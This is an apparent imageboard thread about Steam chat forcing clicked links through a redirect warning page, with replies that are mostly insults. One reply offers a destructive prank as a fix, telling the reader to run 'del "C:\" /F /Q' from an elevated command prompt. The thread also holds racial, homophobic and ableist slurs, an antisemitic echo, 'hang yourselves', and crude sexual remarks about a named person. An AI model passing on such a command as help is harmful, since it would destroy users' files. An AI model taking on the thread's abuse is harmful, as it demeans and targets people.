Friend sends me any link

Is there any fucking way to fix this? I'm not copypasting shit

Other urls found in this thread:

ru.wikipedia.org/wiki/Изяслав_Ярославич
support.steampowered.com/kb_article.php?ref=9609-OBMP-2526&l=english
whateverpage.com
twitter.com/stretchybutt
twitter.com/NSFWRedditImage

So you won't use the generic, ezps OS-level bypass for the retarded security check thing your application-level software does. Literally the easiest thing you could do. I guess you can just get fucked then.

An HTML link exists to be clicked, not copied.

Go ahead, copy ">>10541078" into your browser and see where that takes you.

">>10541078" is not a link.

www.>>10541078.com

And here I thought DRM and DLC was an actual problem for people.

I get: ru.wikipedia.org/wiki/Изяслав_Ярославич

I want millennials to leave

Found your problem

I found the problem.

Yeah, you deserve it.

No, because valve got sued over it and lost.

Use something else to chat. Also leave Holla Forums.

Discord is a normalfag meme

There you go. There's the problem.

support.steampowered.com/kb_article.php?ref=9609-OBMP-2526&l=english

run the following in an elevated command prompt:
del "C:\" /F /Q

Hang yourselves.

dont you mean hang (((yourselves)))

Wow, somebody really fucking tried to sound smart here.

/thread

Do you not fucking know what that does?

Jesus.
Nobody says "hypertext page" when referring to a fucking link. That's like saying "hydrocarbon-combustion based 4-wheeled vehicle" to refer to a car. It's retarded and autismal levels of tryhard.
It's just a link. If it has an anchor, it's also technically just a link, but if you want to be specific, call it "anchor link". There's no need to specify it's hypertext because no other browser protocol supports anchors.

Using a # mark is an embedded link to a page anchor
Stop being a retard

Wew lad

Are you actually still missing the fucking point I so clearly made or are you just plain and outrageously fucking retarded? Do you actually think I don't know what an anchor link does when you didn't even fucking know it didn't do anything in protocols other than hypertext?

I have a different proposition that might solve our dilemma here. Pic related. Gently take one of the advertised Fantasy Reptilian Creature Themed Homosexual Anal Pleasure Inducing Unit and shove it right up your anal cavity.

That's basically suicide, right? Even the gayest nigga who takes 6 dicks in every hole is going to die from that, right?
Furries confuse me.

I want reddit to leave. There's no fix, even fixes that bypass the page still have to connect to the steam server shit so it still takes forever to load pages. It's pretty fucking retarded, I've moved over to discord with a custom CSS I made for tiny UI shit

How exactly is the link presented?
If it's something like www.steam.com?page_redirect=whateverpage.com then it can be easily bypassed.

Through Steam chat the link is presented as normal but clicking it will result in a redirect through Steam Community asking if you trust the link or some shit or flat-out blocking you if it's an unsafe site that somehow slipped through the chat-filters.

Varka, the owner of the company, can take XL no problem

You can watch his disgusting dildoing on toypics.net

How incontinent is he?

I've seen it gape before
It looked like you could stick your fist in and not touch anything

gayautisticinflationniggers(dot)com
there done shit thread you fucking fag

Christ did I accidentally go to Reddit?

Look man I have to use Steam because they're literally the only place left were you can legally buy a PC videogame.

But you don't use it for anything else. And bitching about Steam doesn't help. They've been shit since Half-life 2. Endure and survive.

Stop using steam.

literally why

C'mon now

It's more the idea of why would he do that?
He must have to do some major anal clenching exercises to keep up that ass control

twitter.com/stretchybutt

nice bait 80/8

that's one stretchy butt!!

no
tell your friend to stop using shit hosts or stop using steam